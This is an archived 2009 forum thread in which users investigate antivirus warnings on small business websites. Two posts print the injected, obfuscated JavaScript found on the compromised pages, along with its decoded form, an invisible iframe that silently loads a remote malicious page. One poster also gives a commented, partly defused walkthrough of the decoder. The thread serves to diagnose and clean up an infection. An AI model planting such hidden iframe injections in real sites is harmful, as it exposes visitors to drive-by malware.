PDA

View Full Version : Virus on web-page??



notechyet
08-06-2009, 01:16 PM
Hello
I just wanted to check out an engineer and when I went to www. t f e l .co.nz/ web-site my Avast warned me of a Trojan horse virus being present.
Would someone be able to verify this for me?
Thanks

Rob99
08-06-2009, 01:32 PM
Clicked on your link, NOD32 also blocked it.

8/06/2009 1:31:06 p.m. HTTP filter file www. t f e l .co.nz JS/Kryptik.F virus connection terminated - quarantined ROB-NB\Rob Threat was detected upon access to web by the application: C:\Program Files\Mozilla Firefox\firefox.exe.

notechyet
08-06-2009, 01:41 PM
Hi Rob
Thanks for testing!
I'll contact the owner of the web-page as I sort-off know them.

wainuitech
08-06-2009, 03:27 PM
Just a bit more Info -- Information On Infections (http://www.imagef1.net.nz/files/Web_Page.jpg) -- bottom right the name of the infection.

Speedy Gonzales
08-06-2009, 03:41 PM
Hmm, according to google thats what the torrent version of the Windows 7 beta had in it too. JS probably means it runs in / as part of javascript?

pctek
08-06-2009, 03:42 PM
Nice to know Avast also identified it, NOD sure does.

plod
08-06-2009, 03:55 PM
Safari blocked it

Erayd
08-06-2009, 04:48 PM
The offending code is this:
<script type="text/javascript">var hdOruVsHnKBXZuvtsRmw = "z60z105z102z114z97z109z101z32z119z105z100z116z104z 61z34z52z56z48z34z32z104z101z105z103z104z116z61z34 z54z48z34z32z115z114z99z61z34z104z116z116z112z58z4 7z47z114z110z119z46z107z122z47z105z110z100z101z120 z46z112z104z112z34z32z115z116z121z108z101z61z34z98 z111z114z100z101z114z58z48z112z120z59z32z112z111z1 15z105z116z105z111z110z58z114z101z108z97z116z105z1 18z101z59z32z116z111z112z58z48z112z120z59z32z108z1 01z102z116z58z45z53z48z48z112z120z59z32z111z112z97 z99z105z116z121z58z48z59z32z102z105z108z116z101z11 4z58z112z114z111z103z105z100z58z68z88z73z109z97z10 3z101z84z114z97z110z115z102z111z114z109z46z77z105z 99z114z111z115z111z102z116z46z65z108z112z104z97z40 z111z112z97z99z105z116z121z61z48z41z59z32z45z109z1 11z122z45z111z112z97z99z105z116z121z58z48z34z62z60 z47z105z102z114z97z109z101z62";var kWiFaYwHrXtZBIQvdJDR = hdOruVsHnKBXZuvtsRmw.split("z");var TEptzkmsBZolwWqWunem = "";for (var KYLMhcILlLcFQRyPBlHD=1; KYLMhcILlLcFQRyPBlHD<kWiFaYwHrXtZBIQvdJDR.length; KYLMhcILlLcFQRyPBlHD++){TEptzkmsBZolwWqWunem+=Stri ng.fromCharCode(kWiFaYwHrXtZBIQvdJDR[KYLMhcILlLcFQRyPBlHD]);}document.write(TEptzkmsBZolwWqWunem)</script>
What it does is embed an invisible iframe in the page that points to [edited], resulting in that page loading without the user being aware of it. That page is probably the one containing the virus.

Edit: For those interested in the unscrambled version of the above javascript, here it is (newlines & indentation added by me):

<iframe
width="480"
height="60"
src="http://rnw.kz/index.php"
style="
border:0px;
position:relative;
top:0px;
left:-500px;
opacity:0;
filter:progid:DXImageTransform.Microsoft.Alpha(opa city=0);
-moz-opacity:0
"
>
</iframe>

Jen
08-06-2009, 05:07 PM
Um guys, can you please not post clickable links to websites that contain viruses?

I've broken the URLs up so they aren't clickable (from curious newbies), and edited out Erayd's link as it tried to load when I previewed his post - luckily avast caught it and stopped the page loading.

Erayd
08-06-2009, 05:25 PM
Oops.... good point, I didn't think of the implications there - just figured people would be interested in the dissection, rather than actually trying to click through to the nasties. Sorry!

notechyet
08-06-2009, 09:15 PM
Thanks a lot guys for all your replies(and testing) and an apology for the infected link. I just did not know how else to ask for advice on this problem.

Sweep
08-06-2009, 11:22 PM
Oops.... good point, I didn't think of the implications there - just figured people would be interested in the dissection, rather than actually trying to click through to the nasties. Sorry!

Interesting though, as my Avast stopped me getting to the site in question and mentioned an Iframe issue.

MontrealPaul
10-06-2009, 01:38 AM
Hi, Erayd,

May I ask how you decoded that JS?

I am having a very similar problem with my web page. One person has reported JS/Kryptik.F, and another reported HTML/Framer.BS (he uses AVG). I am told others have reported "viruses" as well, but no further details (thanks!)

I have a piece of code similar to the offending code you showed on my page, which is at http:// soccerpointeclaire [dot] com.
I am not pasting the actual code, and obfuscated the page address, for obvious reasons.

It appears that this is the only page giving problems... The main difference about this page is that it has a Flash logo at the top.

I myself have looked at this page with IE, Firefox and Chrome, with no error. I use Trend OfficeScan (corporate version of PC-Cillin).

That page, btw, has not changed in months. I know, of course, that it could have somehow been modified by a hacker, but I compared it to an older backup copy, and they are identical (I renamed the old one and uploaded the backup, just in case).

I have one possible theory that a new AV signature, shared by various AV developers (if they do that) may be producing false positives... Another is that somehow the Flash code downloaded from the Macromedia site may have become infected.

I guess that's all I have for now, but I welcome any and all questions, and will help in any way I can.

Salutations,
-Paul

MontrealPaul
10-06-2009, 02:13 AM
Quick update: It occured to me to try simply removing that wonky code, which I did, using a plaintext editor, after making a backup of the original page.

Turns out this made no difference (to me) in how the page displays, which suggests that that code was unnecessary, and probably malicious. I use Dreamweaver, btw, which inserts all sorts of wonky code, so sometimes it's hard to tell what belongs and what does not.

For those who want to check it out, I have left the original "infected" page there, under the name of index_Virus.htm (note the capital V)


Salutations,
-Paul

MontrealPaul
10-06-2009, 08:15 AM
Latest:

Yep, it was a trojan/xxs/worm! I'm not 100% certain, but I suspect it might be gumblar. Here are two links that speak of it:

http://www.switched.com/2009/06/02/though-the-conficker-virus-was-bad-meet-gumblar/

http://blog.avast.com/2009/06/03/gumblarcn-summary/

Yes, I have changed the credentials for my website.

Anyone who looks at that "virus" page of mine (see previous posts) will see, after the first <header> tag, a long java script.

What it does, in the end, is open an iframe, with opacity=0 (invisible), to a site in China.

I have broken it down, and commented it, for anywone interested.
I have also modified the code so that any n00b dumb enough to run it will have to try very hard to make it dangerous... (how'd I do, Jen? :))

It will probably be hard to read, in the constraints of this web page, so you may want to copy/paste it into your favourite code editor, where it will be nicely coloured for clarity.


<script type="text/javascript">

// The following assigns the very long string to VariableOne. (Note the repeating string "EOje")
var VariableOne = "EOje91EOje105EOje102EOje114EOje97EOje109EOje101EOj e32EOje119EOje105EOje100EOje116EOje104EOje61EOje34 EOje52EOje56EOje48EOje34EOje32EOje104EOje101EOje10 5EOje103EOje104EOje116EOje61EOje34EOje54EOje48EOje 34EOje32EOje115EOje114EOje99EOje61EOje34EOje104EOj e116EOje116EOje112EOje58EOje47EOje47EOje116EOje114 EOje97EOje102EOje102EOje105EOje99EOje45EOje114EOje 101EOje115EOje111EOje117EOje114EOje99EOje101EOje11 5EOje46EOje99EOje110EOje47EOje111EOje114EOje100EOj e101EOje114EOje47EOje105EOje110EOje46EOje99EOje103 EOje105EOje63EOje50EOje34EOje32EOje115EOje116EOje1 21EOje108EOje101EOje61EOje34EOje98EOje111EOje114EO je100EOje101EOje114EOje58EOje48EOje112EOje120EOje5 9EOje32EOje112EOje111EOje115EOje105EOje116EOje105E Oje111EOje110EOje58EOje114EOje101EOje108EOje97EOje 116EOje105EOje118EOje101EOje59EOje32EOje116EOje111 EOje112EOje58EOje48EOje112EOje120EOje59EOje32EOje1 08EOje101EOje102EOje116EOje58EOje45EOje53EOje48EOj e48EOje112EOje120EOje59EOje32EOje111EOje112EOje97E Oje99EOje105EOje116EOje121EOje58EOje48EOje59EOje32 EOje102EOje105EOje108EOje116EOje101EOje114EOje58EO je112EOje114EOje111EOje103EOje105EOje100EOje58EOje 68EOje88EOje73EOje109EOje97EOje103EOje101EOje84EOj e114EOje97EOje110EOje115EOje102EOje111EOje114EOje1 09EOje46EOje77EOje105EOje99EOje114EOje111EOje115EO je111EOje102EOje116EOje46EOje65EOje108EOje112EOje1 04EOje97EOje40EOje111EOje112EOje97EOje99EOje105EOj e116EOje121EOje61EOje48EOje41EOje59EOje32EOje45EOj e109EOje111EOje122EOje45EOje111EOje112EOje97EOje99 EOje105EOje116EOje121EOje58EOje48EOje34EOje93EOje9 1EOje47EOje105EOje102EOje114EOje97EOje109EOje101EO je93";
//To improve safety, I have replaced code 60 ("<") with 91 ("["), and 62 (">") with 93 ("]").

// This splits VariableOne into a comma-separated string, substituting "EOje" for a comma.
// The result is stored in VariableTwo.
var VariableTwo = VariableOne.split("EOje");
//I'm inserting a printout here of the code so far:
document.write(VariableTwo)
//See http://www.ascii.cl/htmlcodes.htm for a list of codes.

// Initialize and empty VariableThree
var VariableThree = "";

// The following For loop reads as follows:
//starting at 1,
for (var VariableFour=1;
//for each character in VariableTwo,
VariableFour<VariableTwo.length;
//incrementing by one each time
VariableFour++)
//do this:
//VariableThree is now what VariableThree was, plus the character in VariableTwo, at the position VariableFour is at.
{VariableThree+=String.fromCharCode(VariableTwo[VariableFour]);
}

//Not sure why this is necessary...
var VariableFive = ""+VariableThree+"";

//Now, deliver the load; DANGER: This is where it all happens!!
document.write(""+VariableFive+"")
//Again, not sure why it is necessary to border with more empty strings...


//Done.
document.write("-----------------------<BR>");
var var1="Done"
document.write(""+var1+"")

</script>

N.B.: In the original code, "VariableOne", "VariableTwo", etc. are also garbagey-looking names like hPLAmyvsdfELzjhpwQYf.



What this finally produces is something almost (because I "fixed" it) like the following:






Why did I go through all of the above, you may ask? Well, the main reason is that I was learning as I went, so I commented to keep track of where I am so far. Plus, it makes it easier to share afterwards! :nerd:

Cheers,
-Paul